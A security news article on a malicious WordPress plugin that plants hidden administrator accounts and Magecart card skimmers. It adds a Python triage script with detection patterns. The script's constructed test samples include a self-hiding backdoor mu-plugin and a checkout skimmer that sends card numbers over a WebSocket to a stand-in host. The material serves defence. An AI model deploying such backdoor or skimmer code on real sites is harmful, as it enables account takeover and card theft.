Security analysts have recently discovered a malicious WordPress plugin posing a significant threat to e-commerce websites. This rogue plugin is designed to create unauthorized administrator accounts and inject harmful JavaScript code to steal sensitive credit card information, as part of a broader Magecart campaign, according to reports from Sucuri.
Deceptive Tactics and Concealment
The plugin masquerades as a "WordPress Cache Addons" plugin, a common tactic among malicious plugins that want to look like routine site tooling. It typically reaches a site through an already compromised administrator account or by exploiting a vulnerability in an existing plugin; in either case the attacker already has enough access to upload PHP.
Once installed, the plugin copies itself into the mu-plugins (must-use plugins) directory. WordPress loads every PHP file in that directory automatically and offers no activate/deactivate control for it, so the copy runs on every request, and the plugin also hides its entry from the Plugins screen. Manual removal is made harder because the plugin unregisters the callback functions attached to the hooks that plugins of this kind normally rely on, defeating the usual deactivation and uninstall paths.
The plugin also offers an option to create an administrator account and hide it from the user list, which keeps the account out of sight and preserves the attacker's access even if the original entry point is closed. The ultimate goal of the campaign is to inject credit card-stealing JavaScript into checkout pages and send the captured data to a domain controlled by the threat actors.
Security Community Warnings and Ongoing Threats
Security researcher Ben Martin of Sucuri underscores that compromised administrator users are one of the largest sources of WordPress infections. Attackers work within the access they already hold: once they have an admin account, uploading a plugin is the simplest way to run arbitrary PHP on the site, so plugin installation becomes the key step in turning stolen admin credentials into a persistent foothold.
This finding follows an earlier warning from the WordPress security community about a phishing campaign that tricked users into installing a plugin presented as a security patch. That plugin likewise creates an admin user and additionally deploys a web shell for persistent remote access.
Sucuri notes that the phishing lure references a CVE identifier that is still in "RESERVED" status, meaning the entry has been allocated but no details have been published. Citing a yet-to-be-disclosed flaw lends the fake patch credibility while giving the target nothing to verify it against.
Additional Magecart Campaigns and Europol’s Insights
Separately, Sucuri has identified another Magecart campaign that uses the WebSocket protocol to carry skimmer code onto online storefronts. This variant fires when the victim clicks a fake "Complete Order" button overlaid on the genuine checkout button, at which point the entered card details are collected and sent over the WebSocket connection.
Europol's recent report on online fraud emphasizes the persistent threat of digital skimming and notes a shift from front-end to back-end malware; server-side skimmers leave no trace in the page delivered to the browser, which makes them harder to detect. The agency has also notified 443 online merchants that their customers' card data was compromised through skimming attacks.
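The two behaviours described above, a must-use plugin that persists and hides itself and its admin user, and a checkout page carrying an overlay button and a WebSocket skimmer, can both be triaged offline from a copy of the site. The script below is an added example written for this page, not Sucuri's tooling or the campaign's code; the indicator patterns are assumptions drawn from the prose (the hook names `all_plugins`, `pre_user_query` and `views_users` are real WordPress hooks), and the sample mu-plugin, checkout page and host names are constructed here.

```python
"""Offline triage for a WordPress install: scan must-use plugins for the
persistence/hiding behaviours described above, and scan a checkout page for
third-party scripts and inline WebSocket skimmers. Added example; all
patterns are assumptions, and all sample data is constructed."""
import re
import tempfile
from pathlib import Path

# Assumed indicators of the mu-plugin behaviour: self-copy into mu-plugins,
# hiding from the plugin list, hiding a user from the users screen, creating
# an administrator, unregistering removal hooks, and an obfuscated payload.
MU_PLUGIN_INDICATORS = {
    "copies_self_to_mu_plugins": re.compile(r"\b(?:copy|file_put_contents|rename)\s*\([^;]*mu-plugins"),
    "hides_from_plugin_list": re.compile(r"add_filter\s*\(\s*['\"]all_plugins['\"]"),
    "hides_user_from_admin": re.compile(r"add_(?:filter|action)\s*\(\s*['\"](?:pre_user_query|views_users)['\"]"),
    "creates_administrator": re.compile(r"\bwp_(?:create|insert)_user\s*\(|(?:set_role|add_role)\s*\(\s*['\"]administrator['\"]"),
    "unregisters_hooks": re.compile(r"\bremove_(?:action|filter)\s*\("),
    "obfuscated_payload": re.compile(r"\b(?:eval|base64_decode|gzinflate|str_rot13)\s*\("),
}
INLINE_SCRIPT = re.compile(r"<script(?![^>]*\bsrc\s*=)[^>]*>(.*?)</script>", re.I | re.S)
EXTERNAL_SCRIPT = re.compile(r"<script[^>]+src\s*=\s*['\"]https?://([^/'\"]+)", re.I)
WEBSOCKET = re.compile(r"new\s+WebSocket\s*\(\s*['\"]wss?://([^/'\"]+)", re.I)
CARD_FIELD = re.compile(r"\b(?:card[_-]?(?:number|num)|cvv|cvc|ccnum|exp(?:iry|_month|_year))\b", re.I)


def scan_mu_plugins(wp_root: Path) -> dict[str, list[str]]:
    """Return {file name: [indicator names]} for each top-level PHP file in
    wp-content/mu-plugins. WordPress loads every such file automatically and
    they cannot be deactivated from the Plugins screen, so an unexpected file
    here is suspicious on its own; the indicator hits explain why."""
    mu_dir = wp_root / "wp-content" / "mu-plugins"
    findings: dict[str, list[str]] = {}
    if not mu_dir.is_dir():
        return findings
    for php in sorted(mu_dir.glob("*.php")):
        src = php.read_text(errors="replace")
        hits = [name for name, rx in MU_PLUGIN_INDICATORS.items() if rx.search(src)]
        if hits:
            findings[php.name] = hits
    return findings


def scan_checkout_html(html: str, site_host: str) -> dict[str, list[str]]:
    """Flag script sources on other hosts, WebSocket connections to other
    hosts, and inline scripts that read card fields and have a way to send
    them out. A skimmer that is inline and talks only to site_host is not
    caught here and needs a diff against a known-good page."""
    report: dict[str, list[str]] = {
        "external_script_hosts": sorted({h for h in EXTERNAL_SCRIPT.findall(html) if h != site_host}),
        "websocket_hosts": [],
        "inline_card_readers": [],
    }
    for idx, body in enumerate(INLINE_SCRIPT.findall(html)):
        ws_hosts = [h for h in WEBSOCKET.findall(body) if h != site_host]
        report["websocket_hosts"].extend(ws_hosts)
        exfil_capable = bool(ws_hosts) or "XMLHttpRequest" in body or "fetch(" in body
        if CARD_FIELD.search(body) and exfil_capable:
            report["inline_card_readers"].append(f"inline script #{idx}")
    return report


# Constructed sample: a throwaway WordPress tree with one harmless must-use
# plugin and one that shows every behaviour from the text. Not real malware.
def build_sample() -> Path:
    root = Path(tempfile.mkdtemp())
    mu = root / "wp-content" / "mu-plugins"
    mu.mkdir(parents=True)
    (mu / "site-helper.php").write_text("<?php\nadd_action('init', function () { /* harmless */ });\n")
    (mu / "wp-cache-addons.php").write_text("""<?php
add_filter('all_plugins', function ($p) { unset($p['wp-cache-addons/wp-cache-addons.php']); return $p; });
add_action('pre_user_query', function ($q) { $q->query_where .= " AND user_login != 'wpsupport'"; });
remove_action('deactivate_wp-cache-addons/wp-cache-addons.php', 'deactivation_hook');
$u = wp_create_user('wpsupport', 'p@ss', 'x@example.com'); (new WP_User($u))->set_role('administrator');
copy(__FILE__, WP_CONTENT_DIR . '/mu-plugins/' . basename(__FILE__));
""")
    return root


# Constructed checkout page: a fake "Complete Order" overlay whose click
# handler reads the card number and ships it over a WebSocket (host is made up).
SAMPLE_CHECKOUT = """<html><body>
<script src="https://shop.example/wp-includes/js/jquery.js"></script>
<script src="https://cdn.example.net/lib.js"></script>
<form id="checkout"><input name="card_number"><input name="cvv"><button id="real-pay">Pay</button></form>
<div style="position:absolute;top:0" id="fake-btn">Complete Order</div>
<script>
document.getElementById('fake-btn').onclick = function () {
  var ws = new WebSocket('wss://collector.example.org/ws');
  var card = document.querySelector('[name=card_number]').value;
  ws.onopen = function () { ws.send(JSON.stringify({card: card})); };
};
</script>
</body></html>"""

if __name__ == "__main__":
    print("mu-plugins:", scan_mu_plugins(build_sample()))
    print("checkout:", scan_checkout_html(SAMPLE_CHECKOUT, "shop.example"))
```

Both scanners are heuristics for triage, not verdicts: a hit means a file or script deserves a human read, and a legitimate caching or security plugin may trip `unregisters_hooks` on its own. One caveat the hidden-user trick makes important: the admin Users screen and WP-CLI's `wp user list` both go through WP_User_Query, which a `pre_user_query` callback can silently filter, so confirm the administrator set directly in the database (for the default `wp_` prefix, `SELECT u.user_login FROM wp_users u JOIN wp_usermeta m ON m.user_id = u.ID WHERE m.meta_key = 'wp_capabilities' AND m.meta_value LIKE '%administrator%'`) rather than from anything the site itself renders.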
Global Impact and Cryptocurrency Drainer
Group-IB, in collaboration with Europol, has uncovered 23 JS-sniffer families involved in cybercrime operations across Europe and the Americas. These sniffer families, including ATMZOW, health_check, FirstKiss, FakeGA, AngryBeaver, Inter, and R3nin, targeted companies in 17 countries.
Malicious ads on Google Search and Twitter have also been found promoting a cryptocurrency drainer named MS Drainer. Its operators are estimated to have siphoned $58.98 million from 63,210 victims since March 2023 through a network of 10,072 phishing websites. ScamSniffer highlights how cheaply the attackers can reach a specific audience by buying Google search terms and profiling the users who click.